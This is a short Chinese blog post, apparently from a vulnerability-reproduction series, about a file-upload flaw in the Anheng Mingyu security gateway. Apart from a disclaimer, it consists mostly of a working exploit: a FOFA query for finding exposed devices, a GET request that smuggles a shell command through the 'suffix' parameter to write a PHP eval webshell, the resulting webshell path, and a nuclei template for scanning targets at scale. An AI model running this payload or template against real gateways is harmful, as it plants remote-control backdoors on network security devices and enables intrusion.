安恒明御安全网关文件上传

最新推荐文章于 2024-07-11 10:43:08 发布

ju_ju_bone

最新推荐文章于 2024-07-11 10:43:08 发布

阅读量499

点赞数

分类专栏：漏洞复现文章标签：安全 android

本文链接：https://blog.csdn.net/m0_46317063/article/details/132354370

版权

漏洞复现专栏收录该内容

12 篇文章 2 订阅

订阅专栏

安恒明御安全网关文件上传

一、免责声明：

本次文章仅限个人学习使用，如有非法用途均与作者无关，且行且珍惜；由于传播、利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，公众号望雪阁及作者不为此承担任何责任，一旦造成后果请自行承担！如有侵权烦请告知，我们会立即删除整改并向您致以歉意。谢谢！

二、产品介绍：

三、资产梳理：

title=“明御安全网关”

四、漏洞复现：

五、POC：

GET /webui/?g=aaa_portal_auth_local_submit&bkg_flag=0&$type=1&suffix=1|echo+"<%3fphp+eval(\$_POST[\"a\"]);?>"+>+.xxx.php HTTP/1.1

木马地址: http://xxx/webui/.xxx.php

nuclei：


id: mingyu_upload
info:
  name: mingyu_upload
  author: joyboy
  severity: critical
  description: http://xxx.xxx.xxx/webui/?g=aaa_portal_auth_local_submit&bkg_flag=0&$type=1&suffix=1|echo+"<%3fphp+eval(\$_POST[\"a\"]);?>"+>+.xxx.php
  metadata:
    max-request: 1
    fofa-query: title="明御安全网关"
    verified: true
    CVE: 
  tags: 明御安全网关,uploadfile

requests:
  - raw:
      - |
        GET /webui/?g=aaa_portal_auth_local_submit&bkg_flag=0&$type=1&suffix=1|echo+"<%3fphp+eval(\$_POST[\"a\"]);?>"+>+.xxx.php HTTP/1.1
        Host: {{Hostname}}
    matchers:
      - type: word
        part: body
        words:
          - 'success'